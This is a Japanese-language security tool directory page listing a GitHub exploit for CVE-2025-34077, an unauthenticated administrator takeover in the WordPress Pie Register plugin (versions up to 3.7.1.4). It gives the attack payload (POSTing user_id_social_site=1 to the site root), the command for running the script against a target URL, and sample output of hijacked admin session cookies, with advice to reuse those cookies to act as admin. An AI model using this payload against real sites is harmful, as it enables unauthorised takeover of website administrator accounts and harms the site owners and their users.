Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/mrjhaxcore/cve-2025-34077
認証と認可特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubmrjhaxcore/cve-2025-34077

CVE-2025-34077

WordPress Pie Register ≤ 3.7.1.4 - 管理者権限昇格(未認証)

リポジトリを見る
63431年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-34077 — WordPress Pie Register ≤ 3.7.1.4 - 管理者権限昇格 (認証不要)

Exploit Status CVE Badge Python

💀 作成者

Mrj Haxcore

🧠 脆弱性の概要

WordPress用プラグイン Pie Register (バージョン ≤ 3.7.1.4) は、認証不要のエンドポイントを公開しており、攻撃者は特定のペイロードをPOSTするだけで管理者セッションを乗っ取ることができます。

この悪用により、ログイン資格情報を一切必要とせずに、ユーザーID 1(通常は admin) のセッションCookieを窃取できます。


📦 影響を受けるソフトウェア

  • プラグイン名: Pie Register
  • バージョン: <= 3.7.1.4
  • プラグインスラッグ: pie-register
  • プラグインページ
  • 脆弱性を含むダウンロードリンク

📬 脆弱性のあるパラメータ:

user_id_social_site=1

このパラメータをルートURL (/) にPOSTすると、プラグインは攻撃者をID 1(通常は admin) のユーザーとして認証し、有効なセッションCookieを発行します。


🔧 必要な環境

  • Python 3.x
  • requests、beautifulsoup4 (任意、Cookie解析用)

▶️ エクスプロイトの実行

root@kitploit:~
python3 pie.py http://target.site

---
Output
[*] Sending payload to hijack admin session...

[+] Successfully hijacked cookies for user_id=1 (admin):
    wordpress_sec_xxxxxx = <cookie_value>
    wordpress_logged_in_xxxxxx = <cookie_value>

[!] Use these cookies in your browser or tools like curl or Burp to act as admin.
ツールをダウンロード